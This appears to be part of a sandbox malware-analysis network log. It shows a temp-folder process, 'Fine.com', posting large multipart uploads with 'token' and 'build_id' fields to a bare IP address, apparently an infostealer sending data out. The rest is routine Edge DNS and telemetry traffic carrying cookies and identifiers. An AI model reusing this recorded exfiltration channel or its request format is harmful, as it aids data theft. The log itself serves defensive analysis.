                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                                                          Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                                                          Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                                                          Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                                                          Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50051 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:11 UTC | 185 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P
Host: 195.201.141.106
Content-Length: 207993
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:13 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 50059 | 172.64.41.3 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:12 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:12 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:12 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d5d9de542e6-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 50056 | 162.159.61.3 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:12 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:12 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:12 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d5daa200fa3-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 50055 | 162.159.61.3 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:12 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:12 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:12 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d5db995efa7-EWR
alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
23          192.168.2.5  50061        162.159.61.3     443               7340  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-12 16:23:12 UTC  245                OUT        POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:12 UTC  128                OUT        Data Ascii: wwwgstaticcom)TP
2025-01-12 16:23:12 UTC  247                IN         HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:12 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d605d5f4307-EWR
alt-svc: h3=":443"; ma=86400
2025-01-12 16:23:12 UTC  468                IN         Data Ascii: wwwgstaticcom&()


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
24          192.168.2.5  50062        162.159.61.3     443               7340  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-12 16:23:12 UTC  245                OUT        POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:12 UTC  128                OUT        Data Ascii: wwwgstaticcom)TP
2025-01-12 16:23:12 UTC  247                IN         HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:12 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d6069d54339-EWR
alt-svc: h3=":443"; ma=86400
2025-01-12 16:23:12 UTC  468                IN         Data Ascii: wwwgstaticcom()


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
25          192.168.2.5  50066        172.64.41.3      443               7340  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-12 16:23:12 UTC  245                OUT        POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:12 UTC  128                OUT        Data Ascii: wwwgstaticcom)TP
2025-01-12 16:23:12 UTC  247                IN         HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:12 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d6118038c11-EWR
alt-svc: h3=":443"; ma=86400
2025-01-12 16:23:12 UTC  468                IN         Data Ascii: wwwgstaticcomHc)


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
26          192.168.2.5  50063        195.201.141.106  443               1440  C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp                Bytes transferred  Direction  Data
2025-01-12 16:23:12 UTC  184                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----US0HLXBAAI5FU3WT000R
Host: 195.201.141.106
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:23:12 UTC  16355              OUT
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------US0HLXBAAI5FU3WT000RCont
2025-01-12 16:23:13 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:23:13 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50074 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:13 UTC | 185 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P
Host: 195.201.141.106
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------VKNG4E3OZMOZUAAASJ5PCont
2025-01-12 16:23:15 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:23:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50076 | 162.159.61.3 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:14 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:14 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:14 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d6a8bac41d3-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50077 | 162.159.61.3 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:14 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-12 16:23:14 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 12 Jan 2025 16:23:14 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 900e7d6a7dce43f7-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50079 | 18.238.49.99 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:14 UTC | 925 | OUT | GET /b?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-12 16:23:14 UTC | 955 | IN | HTTP/1.1 302 Found
Content-Length: 0
Connection: close
Date: Sun, 12 Jan 2025 16:23:14 GMT
Location: /b2?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
set-cookie: UID=1EA27ce3b1ee0d790c63e791736698994; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
set-cookie: XID=1EA27ce3b1ee0d790c63e791736698994; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 7737ef6f12229d4564d45a2b0c059e2e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P3
X-Amz-Cf-Id: wHHLu1CEnyXJGmmfdzZT8tEqGpk2EC_5iCAkE3aunlrGrbbfslHneg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50078 | 20.110.205.119 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:14 UTC | 1175 | OUT | GET /c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1
2025-01-12 16:23:14 UTC | 1108 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                          Location: https://c.bing.com/c.gif?rnd=1736698992883&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfa5accca5c24be7a92be487d5e1a76b&activityId=bfa5accca5c24be7a92be487d5e1a76b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9C9B0C5E00C44C8A8B186E4587E0FF4B&RedC=c.msn.com&MXFR=0DA5835E35016A581E46962C34736B24
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0DA5835E35016A581E46962C34736B24; domain=.msn.com; expires=Fri, 06-Feb-2026 16:23:14 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:13 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50075 | 13.89.179.13 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:14 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698992881&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 3856
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1
2025-01-12 16:23:14 UTC | 3856 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-12T16:23:12.877Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"locale"
2025-01-12 16:23:14 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=23beda1702194926a21626b7a637e383&HASH=23be&LV=202501&V=4&LU=1736698994514; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=89df4dd1b67d4c29b0739dfcc7f9a505; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1633
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:13 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50088 | 18.238.49.99 | 443 | 7340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:23:14 UTC | 1012 | OUT | GET /b2?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
